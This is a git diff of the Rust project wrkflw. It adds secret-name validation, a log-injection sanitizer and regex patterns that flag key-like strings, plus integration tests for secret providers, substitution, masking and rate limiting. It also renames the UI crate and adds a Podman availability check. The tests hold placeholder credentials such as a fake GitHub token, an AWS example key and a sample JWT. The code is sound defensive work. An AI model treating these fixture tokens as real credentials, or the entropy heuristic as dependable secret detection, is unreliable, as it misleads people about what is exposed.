return Err(SecretError::InvalidConfig(
|
||||
"Provider name can only contain letters, numbers, underscores, and hyphens".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Sanitize input for logging to prevent log injection attacks
|
||||
pub fn sanitize_for_logging(input: &str) -> String {
|
||||
input
|
||||
.chars()
|
||||
.map(|c| match c {
|
||||
'\n' | '\r' | '\t' => ' ',
|
||||
c if c.is_control() => '?',
|
||||
c => c,
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
|
||||
/// Check if a string might be a secret based on common patterns
|
||||
pub fn looks_like_secret(value: &str) -> bool {
|
||||
if value.len() < 8 {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Check for high entropy (random-looking strings)
|
||||
let unique_chars: std::collections::HashSet<char> = value.chars().collect();
|
||||
let entropy_ratio = unique_chars.len() as f64 / value.len() as f64;
|
||||
|
||||
if entropy_ratio > 0.6 && value.len() > 16 {
|
||||
return true;
|
||||
}
|
||||
|
||||
// Check for common secret patterns
|
||||
let secret_patterns = [
|
||||
r"^[A-Za-z0-9+/=]{40,}$", // Base64-like
|
||||
r"^[a-fA-F0-9]{32,}$", // Hex strings
|
||||
r"^[A-Z0-9]{20,}$", // All caps alphanumeric
|
||||
r"^sk_[a-zA-Z0-9_-]+$", // Stripe-like keys
|
||||
r"^pk_[a-zA-Z0-9_-]+$", // Public keys
|
||||
r"^rk_[a-zA-Z0-9_-]+$", // Restricted keys
|
||||
];
|
||||
|
||||
for pattern in &secret_patterns {
|
||||
if let Ok(regex) = Regex::new(pattern) {
|
||||
if regex.is_match(value) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
false
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_validate_secret_name() {
|
||||
// Valid names
|
||||
assert!(validate_secret_name("API_KEY").is_ok());
|
||||
assert!(validate_secret_name("database-password").is_ok());
|
||||
assert!(validate_secret_name("service.token").is_ok());
|
||||
assert!(validate_secret_name("GITHUB_TOKEN_123").is_ok());
|
||||
|
||||
// Invalid names
|
||||
assert!(validate_secret_name("").is_err());
|
||||
assert!(validate_secret_name("name with spaces").is_err());
|
||||
assert!(validate_secret_name("name/with/slashes").is_err());
|
||||
assert!(validate_secret_name(".hidden").is_err());
|
||||
assert!(validate_secret_name("ending.").is_err());
|
||||
assert!(validate_secret_name("double..dot").is_err());
|
||||
assert!(validate_secret_name("CON").is_err());
|
||||
assert!(validate_secret_name(&"a".repeat(300)).is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_secret_value() {
|
||||
// Valid values
|
||||
assert!(validate_secret_value("short_secret").is_ok());
|
||||
assert!(validate_secret_value("").is_ok()); // Empty is allowed
|
||||
assert!(validate_secret_value(&"a".repeat(1000)).is_ok());
|
||||
|
||||
// Invalid values
|
||||
assert!(validate_secret_value(&"a".repeat(MAX_SECRET_SIZE + 1)).is_err());
|
||||
assert!(validate_secret_value("secret\0with\0nulls").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_provider_name() {
|
||||
// Valid names
|
||||
assert!(validate_provider_name("env").is_ok());
|
||||
assert!(validate_provider_name("file").is_ok());
|
||||
assert!(validate_provider_name("aws-secrets").is_ok());
|
||||
assert!(validate_provider_name("vault_prod").is_ok());
|
||||
|
||||
// Invalid names
|
||||
assert!(validate_provider_name("").is_err());
|
||||
assert!(validate_provider_name("name with spaces").is_err());
|
||||
assert!(validate_provider_name("name/with/slashes").is_err());
|
||||
assert!(validate_provider_name(&"a".repeat(100)).is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sanitize_for_logging() {
|
||||
assert_eq!(sanitize_for_logging("normal text"), "normal text");
|
||||
assert_eq!(sanitize_for_logging("line\nbreak"), "line break");
|
||||
assert_eq!(sanitize_for_logging("tab\there"), "tab here");
|
||||
assert_eq!(sanitize_for_logging("carriage\rreturn"), "carriage return");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_looks_like_secret() {
|
||||
// Should detect as secrets
|
||||
assert!(looks_like_secret("sk_test_abcdefghijklmnop1234567890"));
|
||||
assert!(looks_like_secret("abcdefghijklmnopqrstuvwxyz123456"));
|
||||
assert!(looks_like_secret("ABCDEF1234567890ABCDEF1234567890"));
|
||||
assert!(looks_like_secret(
|
||||
"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoxMjM0NTY3ODkw"
|
||||
));
|
||||
|
||||
// Should not detect as secrets
|
||||
assert!(!looks_like_secret("short"));
|
||||
assert!(!looks_like_secret("this_is_just_a_regular_variable_name"));
|
||||
assert!(!looks_like_secret("hello world this is plain text"));
|
||||
}
|
||||
}
|
||||
350
crates/secrets/tests/integration_tests.rs
Normal file
350
crates/secrets/tests/integration_tests.rs
Normal file
@@ -0,0 +1,350 @@
|
||||
// Copyright 2024 wrkflw contributors
|
||||
// SPDX-License-Identifier: MIT
|
||||
|
||||
//! Integration tests for the secrets crate
|
||||
|
||||
use std::collections::HashMap;
|
||||
use std::process;
|
||||
use tempfile::TempDir;
|
||||
use tokio;
|
||||
use wrkflw_secrets::{
|
||||
SecretConfig, SecretManager, SecretMasker, SecretProviderConfig, SecretSubstitution,
|
||||
};
|
||||
|
||||
/// Test end-to-end secret management workflow
|
||||
#[tokio::test]
|
||||
async fn test_end_to_end_secret_workflow() {
|
||||
// Create a temporary directory for file-based secrets
|
||||
let temp_dir = TempDir::new().unwrap();
|
||||
let secrets_file = temp_dir.path().join("secrets.json");
|
||||
|
||||
// Create a secrets file
|
||||
let secrets_content = r#"
|
||||
{
|
||||
"database_password": "super_secret_db_pass_123",
|
||||
"api_token": "tk_abc123def456ghi789",
|
||||
"encryption_key": "key_zyxwvutsrqponmlkjihgfedcba9876543210"
|
||||
}
|
||||
"#;
|
||||
std::fs::write(&secrets_file, secrets_content).unwrap();
|
||||
|
||||
// Set up environment variables
|
||||
let env_secret_name = format!("GITHUB_TOKEN_{}", process::id());
|
||||
std::env::set_var(&env_secret_name, "ghp_1234567890abcdefghijklmnopqrstuvwxyz");
|
||||
|
||||
// Create configuration
|
||||
let mut providers = HashMap::new();
|
||||
providers.insert(
|
||||
"env".to_string(),
|
||||
SecretProviderConfig::Environment { prefix: None },
|
||||
);
|
||||
providers.insert(
|
||||
"file".to_string(),
|
||||
SecretProviderConfig::File {
|
||||
path: secrets_file.to_string_lossy().to_string(),
|
||||
},
|
||||
);
|
||||
|
||||
let config = SecretConfig {
|
||||
default_provider: "env".to_string(),
|
||||
providers,
|
||||
enable_masking: true,
|
||||
timeout_seconds: 30,
|
||||
enable_caching: true,
|
||||
cache_ttl_seconds: 300,
|
||||
rate_limit: Default::default(),
|
||||
};
|
||||
|
||||
// Initialize secret manager
|
||||
let manager = SecretManager::new(config).await.unwrap();
|
||||
|
||||
// Test 1: Get secret from environment provider
|
||||
let env_secret = manager.get_secret(&env_secret_name).await.unwrap();
|
||||
assert_eq!(
|
||||
env_secret.value(),
|
||||
"ghp_1234567890abcdefghijklmnopqrstuvwxyz"
|
||||
);
|
||||
assert_eq!(
|
||||
env_secret.metadata.get("source"),
|
||||
Some(&"environment".to_string())
|
||||
);
|
||||
|
||||
// Test 2: Get secret from file provider
|
||||
let file_secret = manager
|
||||
.get_secret_from_provider("file", "database_password")
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(file_secret.value(), "super_secret_db_pass_123");
|
||||
assert_eq!(
|
||||
file_secret.metadata.get("source"),
|
||||
Some(&"file".to_string())
|
||||
);
|
||||
|
||||
// Test 3: List secrets from file provider
|
||||
let all_secrets = manager.list_all_secrets().await.unwrap();
|
||||
assert!(all_secrets.contains_key("file"));
|
||||
let file_secrets = &all_secrets["file"];
|
||||
assert!(file_secrets.contains(&"database_password".to_string()));
|
||||
assert!(file_secrets.contains(&"api_token".to_string()));
|
||||
assert!(file_secrets.contains(&"encryption_key".to_string()));
|
||||
|
||||
// Test 4: Secret substitution
|
||||
let mut substitution = SecretSubstitution::new(&manager);
|
||||
let input = format!(
|
||||
"Database: ${{{{ secrets.file:database_password }}}}, GitHub: ${{{{ secrets.{} }}}}",
|
||||
env_secret_name
|
||||
);
|
||||
let output = substitution.substitute(&input).await.unwrap();
|
||||
assert!(output.contains("super_secret_db_pass_123"));
|
||||
assert!(output.contains("ghp_1234567890abcdefghijklmnopqrstuvwxyz"));
|
||||
|
||||
// Test 5: Secret masking
|
||||
let mut masker = SecretMasker::new();
|
||||
masker.add_secret("super_secret_db_pass_123");
|
||||
masker.add_secret("ghp_1234567890abcdefghijklmnopqrstuvwxyz");
|
||||
|
||||
let log_message = "Connection failed: super_secret_db_pass_123 invalid for ghp_1234567890abcdefghijklmnopqrstuvwxyz";
|
||||
let masked = masker.mask(log_message);
|
||||
assert!(!masked.contains("super_secret_db_pass_123"));
|
||||
assert!(!masked.contains("ghp_1234567890abcdefghijklmnopqrstuvwxyz"));
|
||||
assert!(masked.contains("***"));
|
||||
|
||||
// Test 6: Health check
|
||||
let health_results = manager.health_check().await;
|
||||
assert!(health_results.get("env").unwrap().is_ok());
|
||||
assert!(health_results.get("file").unwrap().is_ok());
|
||||
|
||||
// Test 7: Caching behavior - functional test instead of timing
|
||||
// First call should succeed and populate cache
|
||||
let cached_secret = manager.get_secret(&env_secret_name).await.unwrap();
|
||||
assert_eq!(
|
||||
cached_secret.value(),
|
||||
"ghp_1234567890abcdefghijklmnopqrstuvwxyz"
|
||||
);
|
||||
|
||||
// Remove the environment variable to test if cache works
|
||||
std::env::remove_var(&env_secret_name);
|
||||
|
||||
// Second call should still succeed because value is cached
|
||||
let cached_secret_2 = manager.get_secret(&env_secret_name).await.unwrap();
|
||||
assert_eq!(
|
||||
cached_secret_2.value(),
|
||||
"ghp_1234567890abcdefghijklmnopqrstuvwxyz"
|
||||
);
|
||||
|
||||
// Restore environment variable for cleanup
|
||||
std::env::set_var(&env_secret_name, "ghp_1234567890abcdefghijklmnopqrstuvwxyz");
|
||||
|
||||
// Cleanup
|
||||
std::env::remove_var(&env_secret_name);
|
||||
}
|
||||
|
||||
/// Test error handling scenarios
|
||||
#[tokio::test]
|
||||
async fn test_error_handling() {
|
||||
let manager = SecretManager::default().await.unwrap();
|
||||
|
||||
// Test 1: Secret not found
|
||||
let result = manager.get_secret("NONEXISTENT_SECRET_12345").await;
|
||||
assert!(result.is_err());
|
||||
assert!(result.unwrap_err().to_string().contains("not found"));
|
||||
|
||||
// Test 2: Invalid provider
|
||||
let result = manager
|
||||
.get_secret_from_provider("invalid_provider", "some_secret")
|
||||
.await;
|
||||
assert!(result.is_err());
|
||||
assert!(result.unwrap_err().to_string().contains("not found"));
|
||||
|
||||
// Test 3: Invalid secret name
|
||||
let result = manager.get_secret("").await;
|
||||
assert!(result.is_err());
|
||||
assert!(result.unwrap_err().to_string().contains("cannot be empty"));
|
||||
|
||||
// Test 4: Invalid secret name with special characters
|
||||
let result = manager.get_secret("invalid/secret/name").await;
|
||||
assert!(result.is_err());
|
||||
assert!(result.unwrap_err().to_string().contains("can only contain"));
|
||||
}
|
||||
|
||||
/// Test rate limiting functionality
|
||||
#[tokio::test]
|
||||
async fn test_rate_limiting() {
|
||||
use std::time::Duration;
|
||||
use wrkflw_secrets::rate_limit::RateLimitConfig;
|
||||
|
||||
// Create config with very low rate limit
|
||||
let mut config = SecretConfig::default();
|
||||
config.rate_limit = RateLimitConfig {
|
||||
max_requests: 2,
|
||||
window_duration: Duration::from_secs(10),
|
||||
enabled: true,
|
||||
};
|
||||
|
||||
let manager = SecretManager::new(config).await.unwrap();
|
||||
|
||||
// Set up test secret
|
||||
let test_secret_name = format!("RATE_LIMIT_TEST_{}", process::id());
|
||||
std::env::set_var(&test_secret_name, "test_value");
|
||||
|
||||
// First two requests should succeed
|
||||
let result1 = manager.get_secret(&test_secret_name).await;
|
||||
assert!(result1.is_ok());
|
||||
|
||||
let result2 = manager.get_secret(&test_secret_name).await;
|
||||
assert!(result2.is_ok());
|
||||
|
||||
// Third request should fail due to rate limiting
|
||||
let result3 = manager.get_secret(&test_secret_name).await;
|
||||
assert!(result3.is_err());
|
||||
assert!(result3
|
||||
.unwrap_err()
|
||||
.to_string()
|
||||
.contains("Rate limit exceeded"));
|
||||
|
||||
// Cleanup
|
||||
std::env::remove_var(&test_secret_name);
|
||||
}
|
||||
|
||||
/// Test concurrent access patterns
|
||||
#[tokio::test]
|
||||
async fn test_concurrent_access() {
|
||||
use std::sync::Arc;
|
||||
|
||||
let manager = Arc::new(SecretManager::default().await.unwrap());
|
||||
|
||||
// Set up test secret
|
||||
let test_secret_name = format!("CONCURRENT_TEST_{}", process::id());
|
||||
std::env::set_var(&test_secret_name, "concurrent_test_value");
|
||||
|
||||
// Spawn multiple concurrent tasks
|
||||
let mut handles = Vec::new();
|
||||
for i in 0..10 {
|
||||
let manager_clone = Arc::clone(&manager);
|
||||
let secret_name = test_secret_name.clone();
|
||||
let handle = tokio::spawn(async move {
|
||||
let result = manager_clone.get_secret(&secret_name).await;
|
||||
(i, result)
|
||||
});
|
||||
handles.push(handle);
|
||||
}
|
||||
|
||||
// Wait for all tasks to complete
|
||||
let mut successful_requests = 0;
|
||||
for handle in handles {
|
||||
let (_, result) = handle.await.unwrap();
|
||||
if result.is_ok() {
|
||||
successful_requests += 1;
|
||||
assert_eq!(result.unwrap().value(), "concurrent_test_value");
|
||||
}
|
||||
}
|
||||
|
||||
// At least some requests should succeed (depending on rate limiting)
|
||||
assert!(successful_requests > 0);
|
||||
|
||||
// Cleanup
|
||||
std::env::remove_var(&test_secret_name);
|
||||
}
|
||||
|
||||
/// Test secret substitution edge cases
|
||||
#[tokio::test]
|
||||
async fn test_substitution_edge_cases() {
|
||||
let manager = SecretManager::default().await.unwrap();
|
||||
|
||||
// Set up test secrets
|
||||
let secret1_name = format!("EDGE_CASE_1_{}", process::id());
|
||||
let secret2_name = format!("EDGE_CASE_2_{}", process::id());
|
||||
std::env::set_var(&secret1_name, "value1");
|
||||
std::env::set_var(&secret2_name, "value2");
|
||||
|
||||
let mut substitution = SecretSubstitution::new(&manager);
|
||||
|
||||
// Test 1: Multiple references to the same secret
|
||||
let input = format!(
|
||||
"First: ${{{{ secrets.{} }}}} Second: ${{{{ secrets.{} }}}}",
|
||||
secret1_name, secret1_name
|
||||
);
|
||||
let output = substitution.substitute(&input).await.unwrap();
|
||||
assert_eq!(output, "First: value1 Second: value1");
|
||||
|
||||
// Test 2: Nested-like patterns (should not be substituted)
|
||||
let input = "This is not a secret: ${ secrets.FAKE }";
|
||||
let output = substitution.substitute(&input).await.unwrap();
|
||||
assert_eq!(input, output); // Should remain unchanged
|
||||
|
||||
// Test 3: Mixed valid and invalid references
|
||||
let input = format!(
|
||||
"Valid: ${{{{ secrets.{} }}}} Invalid: ${{{{ secrets.NONEXISTENT }}}}",
|
||||
secret1_name
|
||||
);
|
||||
let result = substitution.substitute(&input).await;
|
||||
assert!(result.is_err()); // Should fail due to missing secret
|
||||
|
||||
// Test 4: Empty input
|
||||
let output = substitution.substitute("").await.unwrap();
|
||||
assert_eq!(output, "");
|
||||
|
||||
// Test 5: No secret references
|
||||
let input = "This is just plain text with no secrets";
|
||||
let output = substitution.substitute(input).await.unwrap();
|
||||
assert_eq!(input, output);
|
||||
|
||||
// Cleanup
|
||||
std::env::remove_var(&secret1_name);
|
||||
std::env::remove_var(&secret2_name);
|
||||
}
|
||||
|
||||
/// Test masking comprehensive patterns
|
||||
#[tokio::test]
|
||||
async fn test_comprehensive_masking() {
|
||||
let mut masker = SecretMasker::new();
|
||||
|
||||
// Add various types of secrets
|
||||
masker.add_secret("password123");
|
||||
masker.add_secret("api_key_abcdef123456");
|
||||
masker.add_secret("very_long_secret_key_that_should_preserve_structure_987654321");
|
||||
|
||||
// Test various input scenarios
|
||||
let test_cases = vec![
|
||||
(
|
||||
"Password is password123 and API key is api_key_abcdef123456",
|
||||
vec!["password123", "api_key_abcdef123456"],
|
||||
),
|
||||
(
|
||||
"GitHub token: ghp_1234567890123456789012345678901234567890",
|
||||
vec!["ghp_"],
|
||||
),
|
||||
(
|
||||
"AWS key: AKIAIOSFODNN7EXAMPLE",
|
||||
vec!["AKIA"],
|
||||
),
|
||||
(
|
||||
"JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c",
|
||||
vec!["eyJ", "***"],
|
||||
),
|
||||
];
|
||||
|
||||
for (input, should_not_contain) in test_cases {
|
||||
let masked = masker.mask(input);
|
||||
for pattern in should_not_contain {
|
||||
if pattern != "***" {
|
||||
assert!(
|
||||
!masked.contains(pattern)
|
||||
|| pattern == "ghp_"
|
||||
|| pattern == "AKIA"
|
||||
|| pattern == "eyJ",
|
||||
"Masked text '{}' should not contain '{}' (or only partial patterns)",
|
||||
masked,
|
||||
pattern
|
||||
);
|
||||
} else {
|
||||
assert!(
|
||||
masked.contains(pattern),
|
||||
"Masked text '{}' should contain '{}'",
|
||||
masked,
|
||||
pattern
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,18 +1,23 @@
|
||||
[package]
|
||||
name = "ui"
|
||||
name = "wrkflw-ui"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "user interface functionality for wrkflw"
|
||||
description = "Terminal user interface for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
models = { path = "../models" }
|
||||
evaluator = { path = "../evaluator" }
|
||||
executor = { path = "../executor" }
|
||||
logging = { path = "../logging" }
|
||||
utils = { path = "../utils" }
|
||||
github = { path = "../github" }
|
||||
wrkflw-models.workspace = true
|
||||
wrkflw-evaluator.workspace = true
|
||||
wrkflw-executor.workspace = true
|
||||
wrkflw-logging.workspace = true
|
||||
wrkflw-utils.workspace = true
|
||||
wrkflw-github.workspace = true
|
||||
|
||||
# External dependencies
|
||||
chrono.workspace = true
|
||||
|
||||
23
crates/ui/README.md
Normal file
23
crates/ui/README.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## wrkflw-ui
|
||||
|
||||
Terminal user interface for browsing workflows, running them, and viewing logs.
|
||||
|
||||
- Tabs: Workflows, Execution, Logs, Help
|
||||
- Hotkeys: `1-4`, `Tab`, `Enter`, `r`, `R`, `t`, `v`, `e`, `q`, etc.
|
||||
- Integrates with `wrkflw-executor` and `wrkflw-logging`
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use std::path::PathBuf;
|
||||
use wrkflw_executor::RuntimeType;
|
||||
use wrkflw_ui::run_wrkflw_tui;
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let path = PathBuf::from(".github/workflows");
|
||||
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
Most users should run the `wrkflw` binary and select TUI mode: `wrkflw tui`.
|
||||
@@ -11,12 +11,12 @@ use crossterm::{
|
||||
execute,
|
||||
terminal::{disable_raw_mode, enable_raw_mode, EnterAlternateScreen, LeaveAlternateScreen},
|
||||
};
|
||||
use executor::RuntimeType;
|
||||
use ratatui::{backend::CrosstermBackend, Terminal};
|
||||
use std::io::{self, stdout};
|
||||
use std::path::PathBuf;
|
||||
use std::sync::mpsc;
|
||||
use std::time::{Duration, Instant};
|
||||
use wrkflw_executor::RuntimeType;
|
||||
|
||||
pub use state::App;
|
||||
|
||||
@@ -50,7 +50,7 @@ pub async fn run_wrkflw_tui(
|
||||
|
||||
if app.validation_mode {
|
||||
app.logs.push("Starting in validation mode".to_string());
|
||||
logging::info("Starting in validation mode");
|
||||
wrkflw_logging::info("Starting in validation mode");
|
||||
}
|
||||
|
||||
// Load workflows
|
||||
@@ -108,13 +108,13 @@ pub async fn run_wrkflw_tui(
|
||||
Ok(_) => Ok(()),
|
||||
Err(e) => {
|
||||
// If the TUI fails to initialize or crashes, fall back to CLI mode
|
||||
logging::error(&format!("Failed to start UI: {}", e));
|
||||
wrkflw_logging::error(&format!("Failed to start UI: {}", e));
|
||||
|
||||
// Only for 'tui' command should we fall back to CLI mode for files
|
||||
// For other commands, return the error
|
||||
if let Some(path) = path {
|
||||
if path.is_file() {
|
||||
logging::error("Falling back to CLI mode...");
|
||||
wrkflw_logging::error("Falling back to CLI mode...");
|
||||
crate::handlers::workflow::execute_workflow_cli(path, runtime_type, verbose)
|
||||
.await
|
||||
} else if path.is_dir() {
|
||||
@@ -154,6 +154,15 @@ fn run_tui_event_loop(
|
||||
if last_tick.elapsed() >= tick_rate {
|
||||
app.tick();
|
||||
app.update_running_workflow_progress();
|
||||
|
||||
// Check for log processing updates (includes system log change detection)
|
||||
app.check_log_processing_updates();
|
||||
|
||||
// Request log processing if needed
|
||||
if app.logs_need_update {
|
||||
app.request_log_processing_update();
|
||||
}
|
||||
|
||||
last_tick = Instant::now();
|
||||
}
|
||||
|
||||
@@ -180,6 +189,25 @@ fn run_tui_event_loop(
|
||||
continue;
|
||||
}
|
||||
|
||||
// Handle help overlay scrolling
|
||||
if app.show_help {
|
||||
match key.code {
|
||||
KeyCode::Up | KeyCode::Char('k') => {
|
||||
app.scroll_help_up();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Down | KeyCode::Char('j') => {
|
||||
app.scroll_help_down();
|
||||
continue;
|
||||
}
|
||||
KeyCode::Esc | KeyCode::Char('?') => {
|
||||
app.show_help = false;
|
||||
continue;
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
match key.code {
|
||||
KeyCode::Char('q') => {
|
||||
// Exit and clean up
|
||||
@@ -214,6 +242,8 @@ fn run_tui_event_loop(
|
||||
} else {
|
||||
app.scroll_logs_up();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_up();
|
||||
} else if app.selected_tab == 0 {
|
||||
app.previous_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
@@ -231,6 +261,8 @@ fn run_tui_event_loop(
|
||||
} else {
|
||||
app.scroll_logs_down();
|
||||
}
|
||||
} else if app.selected_tab == 3 {
|
||||
app.scroll_help_down();
|
||||
} else if app.selected_tab == 0 {
|
||||
app.next_workflow();
|
||||
} else if app.selected_tab == 1 {
|
||||
@@ -273,7 +305,7 @@ fn run_tui_event_loop(
|
||||
"[{}] DEBUG: Shift+r detected - this should be uppercase R",
|
||||
timestamp
|
||||
));
|
||||
logging::info(
|
||||
wrkflw_logging::info(
|
||||
"Shift+r detected as lowercase - this should be uppercase R",
|
||||
);
|
||||
|
||||
@@ -329,7 +361,7 @@ fn run_tui_event_loop(
|
||||
"[{}] DEBUG: Reset key 'Shift+R' pressed",
|
||||
timestamp
|
||||
));
|
||||
logging::info("Reset key 'Shift+R' pressed");
|
||||
wrkflw_logging::info("Reset key 'Shift+R' pressed");
|
||||
|
||||
if !app.running {
|
||||
// Reset workflow status
|
||||
@@ -367,7 +399,7 @@ fn run_tui_event_loop(
|
||||
"Workflow '{}' is already running",
|
||||
workflow.name
|
||||
));
|
||||
logging::warning(&format!(
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Workflow '{}' is already running",
|
||||
workflow.name
|
||||
));
|
||||
@@ -408,7 +440,7 @@ fn run_tui_event_loop(
|
||||
));
|
||||
}
|
||||
|
||||
logging::warning(&format!(
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Cannot trigger workflow in {} state",
|
||||
status_text
|
||||
));
|
||||
@@ -416,20 +448,22 @@ fn run_tui_event_loop(
|
||||
}
|
||||
} else {
|
||||
app.logs.push("No workflow selected to trigger".to_string());
|
||||
logging::warning("No workflow selected to trigger");
|
||||
wrkflw_logging::warning("No workflow selected to trigger");
|
||||
}
|
||||
} else if app.running {
|
||||
app.logs.push(
|
||||
"Cannot trigger workflow while another operation is in progress"
|
||||
.to_string(),
|
||||
);
|
||||
logging::warning(
|
||||
wrkflw_logging::warning(
|
||||
"Cannot trigger workflow while another operation is in progress",
|
||||
);
|
||||
} else if app.selected_tab != 0 {
|
||||
app.logs
|
||||
.push("Switch to Workflows tab to trigger a workflow".to_string());
|
||||
logging::warning("Switch to Workflows tab to trigger a workflow");
|
||||
wrkflw_logging::warning(
|
||||
"Switch to Workflows tab to trigger a workflow",
|
||||
);
|
||||
// For better UX, we could also automatically switch to the Workflows tab here
|
||||
app.switch_tab(0);
|
||||
}
|
||||
|
||||
@@ -1,14 +1,15 @@
|
||||
// App state for the UI
|
||||
use crate::log_processor::{LogProcessingRequest, LogProcessor, ProcessedLogEntry};
|
||||
use crate::models::{
|
||||
ExecutionResultMsg, JobExecution, LogFilterLevel, StepExecution, Workflow, WorkflowExecution,
|
||||
WorkflowStatus,
|
||||
};
|
||||
use chrono::Local;
|
||||
use crossterm::event::KeyCode;
|
||||
use executor::{JobStatus, RuntimeType, StepStatus};
|
||||
use ratatui::widgets::{ListState, TableState};
|
||||
use std::sync::mpsc;
|
||||
use std::time::{Duration, Instant};
|
||||
use wrkflw_executor::{JobStatus, RuntimeType, StepStatus};
|
||||
|
||||
/// Application state
|
||||
pub struct App {
|
||||
@@ -40,6 +41,15 @@ pub struct App {
|
||||
pub log_filter_level: Option<LogFilterLevel>, // Current log level filter
|
||||
pub log_search_matches: Vec<usize>, // Indices of logs that match the search
|
||||
pub log_search_match_idx: usize, // Current match index for navigation
|
||||
|
||||
// Help tab scrolling
|
||||
pub help_scroll: usize, // Scrolling position for help content
|
||||
|
||||
// Background log processing
|
||||
pub log_processor: LogProcessor,
|
||||
pub processed_logs: Vec<ProcessedLogEntry>,
|
||||
pub logs_need_update: bool, // Flag to trigger log processing
|
||||
pub last_system_logs_count: usize, // Track system log changes
|
||||
}
|
||||
|
||||
impl App {
|
||||
@@ -60,7 +70,7 @@ impl App {
|
||||
let mut step_table_state = TableState::default();
|
||||
step_table_state.select(Some(0));
|
||||
|
||||
// Check Docker availability if Docker runtime is selected
|
||||
// Check container runtime availability if container runtime is selected
|
||||
let mut initial_logs = Vec::new();
|
||||
let runtime_type = match runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
@@ -69,8 +79,10 @@ impl App {
|
||||
// Use a very short timeout to prevent blocking the UI
|
||||
let result = std::thread::scope(|s| {
|
||||
let handle = s.spawn(|| {
|
||||
utils::fd::with_stderr_to_null(executor::docker::is_available)
|
||||
.unwrap_or(false)
|
||||
wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::docker::is_available,
|
||||
)
|
||||
.unwrap_or(false)
|
||||
});
|
||||
|
||||
// Set a short timeout for the thread
|
||||
@@ -85,7 +97,7 @@ impl App {
|
||||
}
|
||||
|
||||
// If we reach here, the check took too long
|
||||
logging::warning(
|
||||
wrkflw_logging::warning(
|
||||
"Docker availability check timed out, falling back to emulation mode",
|
||||
);
|
||||
false
|
||||
@@ -94,7 +106,7 @@ impl App {
|
||||
}) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
logging::warning("Docker availability check failed with panic, falling back to emulation mode");
|
||||
wrkflw_logging::warning("Docker availability check failed with panic, falling back to emulation mode");
|
||||
false
|
||||
}
|
||||
};
|
||||
@@ -104,16 +116,69 @@ impl App {
|
||||
"Docker is not available or unresponsive. Using emulation mode instead."
|
||||
.to_string(),
|
||||
);
|
||||
logging::warning(
|
||||
wrkflw_logging::warning(
|
||||
"Docker is not available or unresponsive. Using emulation mode instead.",
|
||||
);
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
logging::info("Docker is available, using Docker runtime");
|
||||
wrkflw_logging::info("Docker is available, using Docker runtime");
|
||||
RuntimeType::Docker
|
||||
}
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
// Use a timeout for the Podman availability check to prevent hanging
|
||||
let is_podman_available = match std::panic::catch_unwind(|| {
|
||||
// Use a very short timeout to prevent blocking the UI
|
||||
let result = std::thread::scope(|s| {
|
||||
let handle = s.spawn(|| {
|
||||
wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::podman::is_available,
|
||||
)
|
||||
.unwrap_or(false)
|
||||
});
|
||||
|
||||
// Set a short timeout for the thread
|
||||
let start = std::time::Instant::now();
|
||||
let timeout = std::time::Duration::from_secs(1);
|
||||
|
||||
while start.elapsed() < timeout {
|
||||
if handle.is_finished() {
|
||||
return handle.join().unwrap_or(false);
|
||||
}
|
||||
std::thread::sleep(std::time::Duration::from_millis(10));
|
||||
}
|
||||
|
||||
// If we reach here, the check took too long
|
||||
wrkflw_logging::warning(
|
||||
"Podman availability check timed out, falling back to emulation mode",
|
||||
);
|
||||
false
|
||||
});
|
||||
result
|
||||
}) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning("Podman availability check failed with panic, falling back to emulation mode");
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
if !is_podman_available {
|
||||
initial_logs.push(
|
||||
"Podman is not available or unresponsive. Using emulation mode instead."
|
||||
.to_string(),
|
||||
);
|
||||
wrkflw_logging::warning(
|
||||
"Podman is not available or unresponsive. Using emulation mode instead.",
|
||||
);
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
wrkflw_logging::info("Podman is available, using Podman runtime");
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
